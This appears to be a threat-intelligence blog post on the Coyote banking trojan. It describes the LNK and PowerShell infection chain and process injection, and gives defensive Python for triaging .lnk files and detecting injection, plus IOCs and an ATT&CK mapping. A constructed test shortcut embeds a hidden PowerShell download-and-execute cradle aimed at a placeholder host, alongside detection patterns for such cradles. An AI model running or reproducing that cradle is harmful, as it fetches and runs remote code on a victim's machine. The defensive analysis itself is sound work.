Coyote Banking Trojan: A Growing Threat That Targets Victims via LNK Files

Understand the Coyote Banking Trojan, a growing cyber threat using LNK files to steal sensitive financial data.

Friday 14 March, 2025

Coyote Banking Trojan - Cyberware Hub

The Coyote Trojan, also known as the Coyote Banking Trojan, is a banking malware family that targets the customers of financial institutions. First documented in early 2024, it has since expanded its target list to more than 1,030 websites and 73 financial institutions.

Coyote is delivered through a multi-stage chain that starts with an LNK (shortcut) file carrying a PowerShell command, so no executable of its own touches the disk until late in the chain; this is what lets it slip past antivirus products that concentrate on scanning executable files. Once running, it can log keystrokes, capture screenshots, and display phishing overlays on top of banking pages to harvest credentials and other sensitive data.

Coyote is also notable for manipulating Windows security objects and inheriting the permissions of the processes it abuses (see Access Token Manipulation in the ATT&CK mapping below), which makes it a sophisticated and dangerous threat in the current landscape.

Infection Chain:

Initial Vector: LNK Files

The infection starts when the victim opens a malicious LNK (shortcut) file. The shortcut's target is not a document but a PowerShell command line stored in the file's arguments, which runs as soon as the shortcut is opened.

PowerShell (.PS1) Script:

This PowerShell script connects to a server controlled by the attacker and downloads additional scripts. Keeping the first stage small and fetching the rest on demand lets the attacker keep control of the infection and swap or add payloads after delivery.

The downloaded scripts alter system settings, disable security tools, and stage the final payload. These actions help the malware avoid detection and establish a persistent presence on the system.
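To make the first two stages concrete, here is an added example, written for this page and not code from the Coyote authors or from any published analysis, that parses a shortcut file's StringData as laid out in MS-SHLLINK, recovers the target and command-line arguments, decodes a PowerShell -EncodedCommand, and scores the usual download-cradle traits. The sample shortcut, the stage-2 URL (example.invalid) and the "two indicators" threshold are constructed assumptions for the demonstration, not Coyote specifics.

```python
"""Triage a Windows shortcut (.lnk): pull out the target, its command-line
arguments and any PowerShell -EncodedCommand, then flag download-cradle traits.
Field layout follows MS-SHLLINK. The sample shortcut is constructed here;
it is not a real Coyote artefact."""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags (MS-SHLLINK 2.1.1): which optional structures follow the 76-byte header
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))
SW_SHOWMINNOACTIVE = 7

ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
                       r"invoke-expression|net\.webclient|start-bitstransfer", re.I)
INTERP_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(?:\.exe)?$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Walk header -> [LinkTargetIDList] -> [LinkInfo] -> StringData and return the strings."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    link = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_IDLIST:      # LinkTargetIDList: 2-byte IDListSize, then the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # LinkInfo: its leading 4-byte LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    for key, bit in STRING_FIELDS:  # StringData: fixed order, 2-byte char count, no terminator
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        link[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
    return link


def decode_encoded_command(args: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE script text; return it, or '' if absent/invalid."""
    m = ENC_RE.search(args)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage(data: bytes) -> dict:
    """Score the shortcut on the traits a malicious LNK loader usually shows."""
    link = parse_lnk(data)
    target = link.get("relative_path", "")
    args = link.get("arguments", "")
    decoded = decode_encoded_command(args)
    reasons = []
    if INTERP_RE.search(target):
        reasons.append("target is a script interpreter, not a document")
    if re.search(r"-w(?:indowstyle)?\s+hidden", args, re.I):
        reasons.append("console window hidden")
    if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", args, re.I):
        reasons.append("execution policy bypassed")
    if decoded:
        reasons.append("base64 -EncodedCommand present")
    if CRADLE_RE.search(args + " " + decoded):
        reasons.append("download cradle: fetches and runs remote content")
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (launches minimised)")
    return {"target": target, "arguments": args, "decoded_command": decoded,
            "reasons": reasons, "suspicious": len(reasons) >= 2}   # threshold is an assumption


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """Assemble a minimal Unicode .lnk (header + StringData + terminal block) for testing."""
    flags = IS_UNICODE | 0x08 | (0x20 if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for key, bit in STRING_FIELDS:
        if flags & bit:
            text = relative_path if key == "relative_path" else arguments
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body + struct.pack("<I", 0)   # TerminalBlock closes the ExtraData section


# Constructed sample: a shortcut that launches a hidden PowerShell with an encoded cradle.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
    + base64.b64encode(STAGE2.encode("utf-16-le")).decode(),
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

On a real file call triage(open(path, "rb").read()). The target can also be carried only in the LinkTargetIDList or LinkInfo structures, which this parser skips over; a shortcut with no RelativePath string is still caught on its arguments, but a full analysis should decode those structures and the ExtraData blocks too (the TrackerDataBlock's machine ID, for example, is useful for attribution).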

Payload .NET Executable:

The .NET Framework is a software development platform developed by Microsoft, offering a wide range of libraries, tools, and runtime environments for building and running applications. It supports several programming languages, including C#, VB.NET, and F#, and is commonly used for developing Windows desktop applications, web apps, and services. The framework provides key features like memory management, security, and error handling, helping developers create efficient and scalable software. 

Malware authors use the same framework: Coyote's final-stage payload is a .NET executable, and the runtime's conveniences (reflection, dynamic assembly loading, and P/Invoke access to Win32 APIs such as VirtualAllocEx) serve a loader just as well as they serve legitimate software.

Main Entry Point of the Malware:

VirtualAllocEx:

VirtualAllocEx is a Win32 API function that reserves or commits a region of memory in another process's address space. In process injection it is usually the first of three calls: VirtualAllocEx to allocate an executable region in the target, WriteProcessMemory to copy the payload into it, and CreateRemoteThread (or an equivalent) to start executing it. The payload therefore runs inside a trusted host process and never has to exist on disk as a file of its own, which defeats file-based antivirus scanning.
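An added example of how a detector can pick this call sequence out of an API trace; it is my own illustration, not code from the Coyote sample or from any EDR product. Each remote allocation is keyed on (injector pid, target pid, base address); an alert requires a write into that region, an executable protection, and a remote thread started inside it, so the quieter RW-then-RX variant that goes through VirtualProtectEx is caught as well. The trace records, pids, handles and addresses are constructed.

```python
"""Correlate an API-call trace for the cross-process injection sequence
VirtualAllocEx -> WriteProcessMemory -> [VirtualProtectEx] -> CreateRemoteThread.
The trace records below are constructed for this example; in practice they
would come from a sandbox API monitor or EDR telemetry."""

PAGE_READWRITE = 0x04
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
EXEC_PROTECTIONS = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}


def _region_for(regions, pid, target, addr):
    """Return the tracked remote allocation (same injector and target) that contains addr."""
    for (rpid, rtarget, base), region in regions.items():
        if rpid == pid and rtarget == target and base <= addr < base + region["size"]:
            return region
    return None


def find_injections(trace):
    """Walk the trace in order and emit one alert per remote region that gets written,
    made executable, and then used as a remote thread's start address."""
    handles = {}   # (pid, hProcess) -> target pid, learned from OpenProcess
    regions = {}   # (pid, target pid, base) -> state of one remote allocation
    alerts = []
    for rec in trace:
        pid, api, a, ret = rec["pid"], rec["api"], rec["args"], rec["ret"]
        if api == "OpenProcess" and ret:
            handles[(pid, ret)] = a["dwProcessId"]
            continue
        target = handles.get((pid, a.get("hProcess")))
        if target is None or target == pid:
            continue   # unknown handle, or the caller's own process: not cross-process
        if api == "VirtualAllocEx" and ret:
            regions[(pid, target, ret)] = {"base": ret, "size": a["dwSize"], "written": False,
                                           "exec": a["flProtect"] in EXEC_PROTECTIONS,
                                           "seq": ["VirtualAllocEx"]}
            continue
        addr = a.get("lpBaseAddress", a.get("lpAddress", a.get("lpStartAddress")))
        region = _region_for(regions, pid, target, addr) if addr is not None else None
        if region is None:
            continue
        region["seq"].append(api)
        if api == "WriteProcessMemory" and ret:
            region["written"] = True
        elif api == "VirtualProtectEx" and ret:
            region["exec"] = a["flNewProtect"] in EXEC_PROTECTIONS
        elif api == "CreateRemoteThread" and ret and region["written"] and region["exec"]:
            alerts.append({"pid": pid, "target_pid": target, "base": region["base"],
                           "size": region["size"], "entry": addr, "sequence": list(region["seq"])})
    return alerts


# Constructed trace: one record per API call, as seen from the calling process.
TRACE = [
    # injector 4120 -> pid 2736: classic RWX allocation, write, remote thread
    {"pid": 4120, "api": "OpenProcess", "args": {"dwDesiredAccess": 0x1FFFFF, "dwProcessId": 2736}, "ret": 0x2A4},
    {"pid": 4120, "api": "VirtualAllocEx", "args": {"hProcess": 0x2A4, "dwSize": 0x3000, "flProtect": PAGE_EXECUTE_READWRITE}, "ret": 0x1E0000},
    {"pid": 4120, "api": "WriteProcessMemory", "args": {"hProcess": 0x2A4, "lpBaseAddress": 0x1E0000, "nSize": 0x2C00}, "ret": 1},
    {"pid": 4120, "api": "CreateRemoteThread", "args": {"hProcess": 0x2A4, "lpStartAddress": 0x1E0000}, "ret": 0x2B0},
    # injector 4120 -> pid 3180: RW allocation flipped to RX before the thread starts
    {"pid": 4120, "api": "OpenProcess", "args": {"dwDesiredAccess": 0x1FFFFF, "dwProcessId": 3180}, "ret": 0x2C8},
    {"pid": 4120, "api": "VirtualAllocEx", "args": {"hProcess": 0x2C8, "dwSize": 0x2000, "flProtect": PAGE_READWRITE}, "ret": 0x3F0000},
    {"pid": 4120, "api": "WriteProcessMemory", "args": {"hProcess": 0x2C8, "lpBaseAddress": 0x3F0000, "nSize": 0x1800}, "ret": 1},
    {"pid": 4120, "api": "VirtualProtectEx", "args": {"hProcess": 0x2C8, "lpAddress": 0x3F0000, "dwSize": 0x2000, "flNewProtect": PAGE_EXECUTE_READ}, "ret": 1},
    {"pid": 4120, "api": "CreateRemoteThread", "args": {"hProcess": 0x2C8, "lpStartAddress": 0x3F0010}, "ret": 0x2D4},
    # benign: a process allocating inside its own address space
    {"pid": 5000, "api": "VirtualAlloc", "args": {"dwSize": 0x1000, "flProtect": PAGE_READWRITE}, "ret": 0x400000},
    # benign: debugger-style read of another process, no allocation and no thread
    {"pid": 6100, "api": "OpenProcess", "args": {"dwDesiredAccess": 0x0410, "dwProcessId": 2736}, "ret": 0x190},
    {"pid": 6100, "api": "ReadProcessMemory", "args": {"hProcess": 0x190, "lpBaseAddress": 0x7FF600000000, "nSize": 0x100}, "ret": 1},
]

if __name__ == "__main__":
    for alert in find_injections(TRACE):
        print(alert)
```

The correlator deliberately ignores a remote thread whose start address was never written by the injector (for example a thread started at LoadLibraryA for classic DLL injection) and any technique that avoids these APIs altogether, so it complements rather than replaces telemetry such as Sysmon Event ID 8 (CreateRemoteThread), which records the source and target images regardless of what preceded the call.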

Indicators of Compromise (IOCs), SHA-256 file hashes:

fd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e
b79f607ac9f1a713e393dd112c60cfe4400b8ed5bea0807b115d587f3acc664d
3b8a20d6bb88c8eaa0edd4f7627161ef9fa0ecf0997015c2ad52a69dc07831fe
060f349bed114cbc7986e52ec38423537883a473198741835ce782b27dc2baa0
c39adf3a591905f65e307bb6410f7dc71b78b27ccff8794bd7693c27856699f2
c2d25d9c88f68286f332ee1b0e989046c28bf5f10383990b5dcbb7d639ee21bc

MITRE ATT&CK Matrix:

Tactic                 Techniques

Initial Access         Phishing: Spearphishing Attachment (.LNK)
Execution              Native API
                       Command and Scripting Interpreter (PowerShell)
                       Exploitation for Client Execution
Persistence            Scripting (.PS1)
                       Windows Service
                       Browser Extensions
Privilege Escalation   Process Injection
                       DLL Side-Loading
                       Bypass User Account Control
                       Access Token Manipulation
Defense Evasion        Obfuscated Files or Information
                       Disable or Modify Tools
                       Masquerading
                       Virtualization/Sandbox Evasion
Discovery              Virtualization/Sandbox Evasion
                       Security Software Discovery
                       Application Window Discovery
                       File and Directory Discovery
Credential Access      OS Credential Dumping
                       Credentials in Registry
Collection             Archive Collected Data
                       Email Collection
                       Clipboard Data
Command and Control    Non-Application Layer Protocol
                       Application Layer Protocol
                       Ingress Tool Transfer

Happy Hunting !!